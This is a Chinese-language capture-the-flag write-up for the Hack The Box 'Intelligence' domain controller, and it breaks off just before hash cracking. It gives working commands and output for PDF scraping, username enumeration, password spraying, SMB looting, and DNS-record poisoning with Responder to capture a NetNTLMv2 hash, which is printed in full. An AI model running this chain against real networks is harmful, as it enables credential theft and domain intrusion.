Intelligence-htb-writeup

0x00 靶场技能介绍

章节技能：PDF文件创建人信息批量获取、PDF文件批量下载、PDF内容敏感信息泄露、kerbrute 验证域用户名是否有效、枚举域用户密码是否正确、SMB敏感信息泄露、NTLMv2攻击(获取密码)、Krbrelayx、dnstool、responder、bloodhound 域环境枚举与利用、滥用读取GMSA密码、伪造服务票据、使用票据登录域控

参考链接：https://0xdf.gitlab.io/2021/11/27/htb-intelligence.html

参考链接：https://teemuhakkarainen.com/hack-the-box-intelligence/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.248

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:34 CST
Nmap scan report for 10.10.10.248
Host is up (0.40s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49683/tcp open  unknown
49684/tcp open  unknown
49694/tcp open  unknown
49743/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 34.79 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49683,49684,49694,49743,    

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49683,49684,49694,49743 -sC -sV --min-rate=10000 10.10.10.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:35 CST
Nmap scan report for 10.10.10.248
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Intelligence
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:40+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2024-03-29T21:38:37+00:00; +7h00m00s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:42+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:42+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  adws?
49667/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  tcpwrapped
49684/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49743/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-03-29T21:38:04
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.95 seconds

3、绑定下发现了域名地址

┌──(root㉿offsec)-[~]
└─# echo '10.10.10.248 intelligence.htb dc.intelligence.htb' >> /etc/hosts

4、其他端口都尝试过了，暂时没有什么发现，那就访问下80端口的地址吧

http://10.10.10.248/
http://intelligence.htb/

5、这里子域名也枚举了，但是发现新增的子域名解析地址都是这个网页内容，说明入口点还是这个网页上面。

6、这个网站上面存在很多PDF文件

http://10.10.10.248/documents/2020-01-01-upload.pdf

http://10.10.10.248/documents/2020-12-15-upload.pdf

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool 2020-01-01-upload.pdf 
ExifTool Version Number         : 12.70
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2024:03:29 23:29:36+08:00
File Access Date/Time           : 2024:03:29 23:29:37+08:00
File Inode Change Date/Time     : 2024:03:29 23:29:36+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.70
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2024:03:29 23:29:44+08:00
File Access Date/Time           : 2024:03:29 23:29:45+08:00
File Inode Change Date/Time     : 2024:03:29 23:29:44+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

7、这里发现PDF文件的文件名都是有规律的，可以遍历的，下面使用burp进行遍历

8、这里发现了一些敏感信息，在PDF内容里

http://intelligence.htb/documents/2020-06-04-upload.pdf

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

新帐户指南
欢迎来到情报公司！
请使用您的用户名和默认密码登录：
NewIntelligenceCorpUser9876
登录后，请尽快更改您的密码。

http://intelligence.htb/documents/2020-12-30-upload.pdf

Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts

内部IT更新
最近我们的网络服务器出现了一些中断。Ted得了一个
如果再次发生这种情况，脚本将帮助通知我们。
此外，在我们最近的安全审计之后进行了讨论，我们正在进行中
锁定我们的服务帐户

9、知道了默认密码，但是还缺少账号信息，这里其实根据上面的PDF文件，我能发现一些账号信息，这里使用writeup里的脚本直接获取吧

#!/usr/bin/env python3

import datetime
import io
import PyPDF2
import requests


t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)
keywords = ['user', 'password', 'account', 'intelligence', 'htb', 'login', 'service', 'new']
users = set()

while True:
    url = t.strftime("http://10.10.10.248/documents/%Y-%m-%d-upload.pdf")
    resp = requests.get(url)
    if resp.status_code == 200:
        with io.BytesIO(resp.content) as data:
            pdf = PyPDF2.PdfFileReader(data)
            users.add(pdf.getDocumentInfo()['/Creator'])
            for page in range(pdf.getNumPages()):
                text = pdf.getPage(page).extractText()
                if any([k in text.lower() for k in keywords]):
                    print(f'==={url}===\n{text}')
    t = t + datetime.timedelta(days=1)
    if t >= end:
        break

with open('users', 'w') as f:
    f.write('\n'.join(users)) 

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ sudo python3 test.py
===http://10.10.10.248/documents/2020-06-04-upload.pdf===
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
===http://10.10.10.248/documents/2020-12-30-upload.pdf===
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ cat users     
Stephanie.Young
Anita.Roberts
Thomas.Valenzuela
Brian.Morris
Ian.Duncan
Daniel.Shelton
Scott.Scott
David.Reed
Jason.Patterson
Thomas.Hall
Jennifer.Thomas
David.Wilson
Tiffany.Molina
Richard.Williams
Kaitlyn.Zimmerman
Travis.Evans
Brian.Baker
William.Lee
Jessica.Moody
John.Coleman
Samuel.Richardson
Veronica.Patel
Danny.Matthews
Jose.Williams
David.Mcbride
Jason.Wright
Teresa.Williamson
Kelly.Long
Nicole.Brock
Darryl.Harris

10、到这里其实账号的有效性，需要我们进行确认，由于靶机是个域环境，故我们可以使用 kerbrute 工具来验证，当前账号是否存在

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ ../tools/kerbrute userenum -d intelligence.htb --dc 10.10.10.248 users 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/01/24 - Ronnie Flathers @ropnop

2024/04/01 22:03:19 >  Using KDC(s):
2024/04/01 22:03:19 >   10.10.10.248:88

2024/04/01 22:03:19 >  [+] VALID USERNAME:       Thomas.Valenzuela@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       David.Reed@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Daniel.Shelton@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Stephanie.Young@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Ian.Duncan@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Anita.Roberts@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Jason.Patterson@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Scott.Scott@intelligence.htb
2024/04/01 22:03:19 >  [+] VALID USERNAME:       Brian.Morris@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       David.Wilson@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Travis.Evans@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Richard.Williams@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Kaitlyn.Zimmerman@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Jennifer.Thomas@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       William.Lee@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Jessica.Moody@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Brian.Baker@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Tiffany.Molina@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Samuel.Richardson@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       David.Mcbride@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       Veronica.Patel@intelligence.htb
2024/04/01 22:03:20 >  [+] VALID USERNAME:       John.Coleman@intelligence.htb
2024/04/01 22:03:21 >  [+] VALID USERNAME:       Nicole.Brock@intelligence.htb
2024/04/01 22:03:21 >  [+] VALID USERNAME:       Darryl.Harris@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Thomas.Hall@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Kelly.Long@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Jason.Wright@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Teresa.Williamson@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Danny.Matthews@intelligence.htb
2024/04/01 22:03:25 >  [+] VALID USERNAME:       Jose.Williams@intelligence.htb
2024/04/01 22:03:25 >  Done! Tested 30 usernames (30 valid) in 6.406 seconds

11、然后就是使用 crackmapexec 工具来密码尝试破解了

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ crackmapexec smb 10.10.10.248 -u users -p 'NewIntelligenceCorpUser9876' --continue-on-success
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 

12、这里发现成功了一个账号，那尝试用这个账号来查看下SMB共享的内容吧

[+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.10.248  -U Tiffany.Molina%'NewIntelligenceCorpUser9876'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk      
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.248 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.248 -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.248:445        Name: intelligence.htb          Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        IT                                                      READ ONLY
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

13、都是只有可读的权限，没有写入的权限，那尝试翻阅下里面的文件吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.248\\Users  -U Tiffany.Molina%'NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 09:20:26 2021
  ..                                 DR        0  Mon Apr 19 09:20:26 2021
  Administrator                       D        0  Mon Apr 19 08:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 15:21:46 2018
  Default                           DHR        0  Mon Apr 19 10:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 15:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 15:11:27 2018
  Public                             DR        0  Mon Apr 19 08:18:39 2021
  Ted.Graves                          D        0  Mon Apr 19 09:20:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 08:51:46 2021

                3770367 blocks of size 4096. 1461870 blocks available
smb: \> cd Tiffany.Molina\
smb: \Tiffany.Molina\> ls
  .                                   D        0  Mon Apr 19 08:51:46 2021
  ..                                  D        0  Mon Apr 19 08:51:46 2021
  AppData                            DH        0  Mon Apr 19 08:51:46 2021
  Application Data                DHSrn        0  Mon Apr 19 08:51:46 2021
  Cookies                         DHSrn        0  Mon Apr 19 08:51:46 2021
  Desktop                            DR        0  Mon Apr 19 08:51:46 2021
  Documents                          DR        0  Mon Apr 19 08:51:46 2021
  Downloads                          DR        0  Sat Sep 15 15:12:33 2018
  Favorites                          DR        0  Sat Sep 15 15:12:33 2018
  Links                              DR        0  Sat Sep 15 15:12:33 2018
  Local Settings                  DHSrn        0  Mon Apr 19 08:51:46 2021
  Music                              DR        0  Sat Sep 15 15:12:33 2018
  My Documents                    DHSrn        0  Mon Apr 19 08:51:46 2021
  NetHood                         DHSrn        0  Mon Apr 19 08:51:46 2021
  NTUSER.DAT                        AHn   131072  Tue Apr  2 04:48:57 2024
  ntuser.dat.LOG1                   AHS    86016  Mon Apr 19 08:51:46 2021
  ntuser.dat.LOG2                   AHS        0  Mon Apr 19 08:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf    AHS    65536  Mon Apr 19 08:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Apr 19 08:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Apr 19 08:51:46 2021
  ntuser.ini                        AHS       20  Mon Apr 19 08:51:46 2021
  Pictures                           DR        0  Sat Sep 15 15:12:33 2018
  Recent                          DHSrn        0  Mon Apr 19 08:51:46 2021
  Saved Games                         D        0  Sat Sep 15 15:12:33 2018
  SendTo                          DHSrn        0  Mon Apr 19 08:51:46 2021
  Start Menu                      DHSrn        0  Mon Apr 19 08:51:46 2021
  Templates                       DHSrn        0  Mon Apr 19 08:51:46 2021
  Videos                             DR        0  Sat Sep 15 15:12:33 2018

                3770367 blocks of size 4096. 1461870 blocks available
smb: \Tiffany.Molina\> cd Desktop\
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Mon Apr 19 08:51:46 2021
  ..                                 DR        0  Mon Apr 19 08:51:46 2021
  user.txt                           AR       34  Tue Apr  2 04:39:39 2024

                3770367 blocks of size 4096. 1461870 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt 
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\>

14、在这里我们发现了第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat user.txt  
60651dd079df97c917365dcbffd853ad

0x02 系统权限获取

15、其实上面的SMB枚举中，还获取到一个脚本的信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.248\\IT  -U Tiffany.Molina%'NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 19 08:50:55 2021
  ..                                  D        0  Mon Apr 19 08:50:55 2021
  downdetector.ps1                    A     1046  Mon Apr 19 08:50:55 2021

                3770367 blocks of size 4096. 1461870 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat downdetector.ps1 
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

该脚本进入 LDAP 并获 取所有计算机的列表，然后循环访问名称以“web”开头的计算机。它将尝试向该服务器发出 Web 请求（使用正在运行的用户的凭据），如果状态代码不是 200，它将向 Ted.Graves 发送电子邮件，让他们知道主机已关闭。顶部的评论说它计划每五分钟运行一次。

16、到这里可以联想到NTLMv2攻击（获取密码），下面使用Krbrelayx工具集里的dnstool.py工具进行尝试

dnstool.py是Krbrelayx附带的一个脚本，它可以：

https://github.com/dirkjanm/krbrelayx

通过 LDAP 添加/修改/删除 Active Directory 集成 DNS 记录。

值得一试，看看 Tiffany.Molina 是否有权通过使用以下选项运行来进行此类更改：

-u intelligence\\Tiffany.Molina- 进行身份验证的用户；
-p NewIntelligenceCorpUser9876- 用户的密码；
--action add- 添加新记录；
--record web-0xdf- 要添加的域；
--data 10.01.14.19- 要添加的数据，在本例中为解析 web-0xdf 的 IP；
--type A- 要添加的记录类型。

17、下面开始架设和利用

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.248] 50065
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: web1
Connection: Keep-Alive

┌──(kali㉿offsec)-[~/Desktop/tools/krbrelayx]
└─$ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web-shiyan -d 10.10.14.11 -t A --allow-multiple
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding extra record
[+] LDAP operation completed successfully


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d 
[sudo] kali 的密码：
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.11]
    Responder IPv6             [dead:beef:2::1009]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-FS1RHMHFQ6J]
    Responder Domain Name      [JAHG.LOCAL]
    Responder DCE-RPC Port     [47998]

[+] Listening for events...                                                                                                                                

[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:55d715a0f1b61eca:F1339196011CD69F875E8E722DA39D19:0101000000000000163AB6657E84DA01DF6CCD119A4C9F5B00000000020008004A0041004800470001001E00570049004E002D00460053003100520048004D0048004600510036004A00040014004A004100480047002E004C004F00430041004C0003003400570049004E002D00460053003100520048004D0048004600510036004A002E004A004100480047002E004C004F00430041004C00050014004A004100480047002E004C004F00430041004C00080030003000000000000000000000000020000042953171FBEFDE40C17FFC1A59EE6BBD28BDA280BDCCEB581936E5420526A2E70A001000000000000000000000000000000000000900400048005400540050002F007700650062002D00730068006900790061006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000                       
[*] Skipping previously captured hash for intelligence\Ted.Graves

18、这里成功的获取到了HTLMv2攻击（密码获取）的结果，下面对获取到的密码进行破解

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "NTLMv2"                                   
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash            
